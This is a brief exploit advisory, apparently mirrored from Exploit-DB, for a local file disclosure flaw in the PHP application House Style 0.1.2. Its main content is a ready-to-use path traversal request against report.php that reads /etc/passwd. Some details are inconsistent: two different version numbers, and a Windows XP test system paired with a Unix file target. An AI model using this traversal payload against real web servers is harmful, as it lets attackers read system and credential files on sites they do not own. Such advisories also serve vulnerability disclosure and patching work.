House Style 0.1.2 – ‘readfile()’ Local File Disclosure - 体验盒子

作者： GoLd_M

日期： 2012-07-12

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/19768/

# Exploit Title: House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/housestyle/
# Version: 1.03
# Category:: readfile() Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[House Style 0.1.2]/report.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test :http://upload.traidnt.net/upfiles/aqz25984.jpg